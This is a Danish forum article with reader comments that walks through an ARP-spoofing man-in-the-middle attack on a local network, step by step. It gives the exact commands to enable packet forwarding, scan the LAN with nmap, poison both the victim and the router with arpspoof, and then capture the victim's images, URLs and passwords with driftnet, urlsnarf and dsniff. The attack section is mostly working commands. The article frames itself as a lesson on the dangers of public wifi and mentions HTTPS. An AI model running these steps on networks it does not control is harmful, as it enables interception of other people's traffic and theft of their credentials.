Brugernavn:



Kodeord: Husk
Forside Forum Artikler Downloads Søg
 

MitM - ARPspoofing med Dsniff.

Forord

Følgende er en guide der vil forklare hvor nemt det er at lave ARP spoofing, og bliver MitM, opfordrer til kun at prøve det i et kontrolleret miljø og på eget netværk samt enheder.

Indholdsfortegnelse

1.0   Introduktion
   1.1   Man in the Middle
2.0   Udføre ARP spoofing
   2.1   Værktøjer
   2.2   Første skridt
   2.3   Afsluttende

1.0  Introduktion

ARP spoofing er en teknik som bruges til at angribe LAN (local-area network). Det virker kun på netværk der bruger ARP (Address Resolution Protocol). ARP spoofing kan tillade angriberen at opfange, ændre og stoppe netværkstrafikken fra brugeren af et bestemt LAN. Deraf kommer udtrykket MitM (Man in the Middle) eller "Manden i midten".

1.1  Man in the Middle

Vil ikke gå så dybt omkring dette, men vil forklare jer kort omkring MitM.
Kort fortalt går vi ind og stjæler brugerens trafik inden det kommer hen til routeren.
Dette gør vi ved at få offerets maskine til at tro at vi er routeren, og derved får vi adgang til alt hans trafik.
Illustration:


Yderligere forklaring og eksempler kan findes her: http://en.wikipedia.org/wiki/Man-in-the-middle_attack

2.0  Udføre ARP spoofing

2.1  Værktøjer

Vi bruger følgende værktøjer i denne guide:
- En client med Linux Ubuntu 11.04 (angriberen).
- En client med Microsoft Windows 7 (offeret).
- Dsniff, Driftnet og Nmap.
For mere info omkring de sidste nævne værktøjer, klik på linket. Går ikke i dybden omkring hvordan de fungere, eller hvad de kan.

2.2  Første skridt

Første og fremmest kræver det at du har lidt basis viden omkring Linux Ubuntu f.eks. at installere sudo etc. Du vil undervejs blive spurgt at terminalen efter dit sudo password.

Som det aller første åbner du din terminal.
Herefter starter vi ud med denne kommando:
  • sudo apt-get install nmap dsniff driftnet
Forklaring:
sudo = super user do (admin rettigheder).
apt-get install = applikation installering (lokaliser, download, installer).

Når du har installeret disse værktøjer, skal vi til at tillade "Packet Forwarding". Dette vil gøre det muligt at få sent alt netværks trafikken til vores enhed. Hvis dette ikke gøres vil klienten ikke være i stand til at kunne kommunikere med nogen og opdage at tingene ikke er som de skal være.

Først udfører vi en simpel sudo kommando:
  • sudo su
Herefter denne kode:
  • cat /proc/sys/net/ipv4/ip_forward

Nu vil terminalen enten skrive 0 eller 1. Den burde skrive 0 medmindre du allerede selv har slået packet forwarding til.
Nu skriver vi så en kommando der tillader dette.
  • echo 1 > /proc/sys/net/ipv4/ip_forward

cat = Konkatenere filer og udskriver på standart output
echo = Udskriver en linje af tekst
/ = Mappe

Før vi herefter begynder at scanne netværket for tilsluttede klienter, tjekker vi lige vores egen IP.
Det gør vi med denne kommando:
  • ifconfig

Lad os sige vores IP er: 192.168.1.100

Nu skal vi til at scanne netværket for klienter, her bruger vi nmap.
Igen starter vi med at logge ind som sudo.
  • sudo su
Også scanner vi netværket:
  • nmap -sF 192.168.1.1-255

Nu skulle den gerne udskrive mindst 3 IP-adresser.
192.168.1.1 - Den første IP er altid gateway/routeren.
192.168.1.100 - Vores IP-adresse.
192.168.1.105 - En tredje enhed (vores offer).

Nu skal vi igang med ARPspoof som gør os til MitM og fortæller offerets computeren at vi er routeren og at alt trafik skal gå igennem os.
  1. sudo su

  3. arpspoof -t 192.168.1.1 192.168.1.105
Åben en ny terminal, og brug denne kommando efterfølgende:
  1. sudo su

  3. arpspoof -t 192.168.1.105 192.168.1.1

Vi er nu manden i midten, og kan begyndte at bruge de værktøjer vi hentede før.
Vi starter ud med driftnet, hvilket opfanger alle billeder i formater som .jpg .gif .bmp .png osv.
Det vil vise alle billeder som dit offer ser i sin webbrowser.
  1. sudo su

  3. driftnet -i eth0
i = Interface
eth0 = Port nummer for kabel internet

Driftnet virker som et pop-up vindue.
Eksempel:


Næste værktøj vi kigger på er urlsnarf, som spotter weblinks.
  1. sudo su

  3. urlsnarf -i ech0
Eksempel:


Sidste værktøj vi skal kigge på er Dsniff. Dsniff går efter password til eksempelvis FTP.
  • dsniff -i ech0
Eksempel:


2.3  Afsluttende

Håber artiklen har forklaret lidt omkring MitM og ARP spoofing.
Så husk på næste gang du sidder på et offentlig wifi-netværk hvor nemt det kan være at stjæle din information. Det kan eksempelvis være på café, offentlig transport eller andet. Det kan måske få dig til at tænke en ekstra gang inden du logger ind på ikke krypteret sider via en andens netværk, og ellers brug HTTPS hvis du har muligheden for det.
Sidst redigeret 10:13 15/06/2011
Oprettet af:
Zatex

Off Topic

Point modtaget: 200

Rate:
17:02 01/06/2011

Kommentarer

Giv din mening tilkende om denne artikel, eller læs andres.
Har du spørgsmål eller brug for hjælp til denne artikel henvises du til forummet.
God artikel, kendte dog allerede til ARP-Spoofing før og hvordan og hvorledes, men det gør da bestemt ikke artiklen dårligere. ;)

Good work.
Oprettet af:
judni
  Mail
13:00 05/06/2011
Har lige rodet lidt med det her i lidt tid men da jeg kom til

Nu skal vi igang med ARPspoof som gør os til MitM og fortæller offerets computeren at vi er routeren og at alt trafik skal gå igennem os.
  1. sudo su

  3. arpspoof -t 192.168.1.1 192.168.1.105
Åben en ny terminal, og brug denne kommando efterfølgende:
  1. sudo su

  3. arpspoof -t 192.168.1.105 192.168.1.1

delen tog det ofrets net ned. Jeg havde stadig net.
Jeg huskede at rette tallene ja.
Er dette meningen?
Oprettet af:
www.Mike-bellika.dk
  Mail
16:28 12/06/2011
mike > det er fordi ubuntu har sin firewall slået til..

just hit: sudo ufw disable
Oprettet af:
brugernavn
  Mail
19:08 21/08/2011
Du skal være oprettet og logget ind for at kommentere en artikel
Copyright © Rowl.dk v/ Michael Raagaard | 2005-12 | Alle rettigheder forbeholdes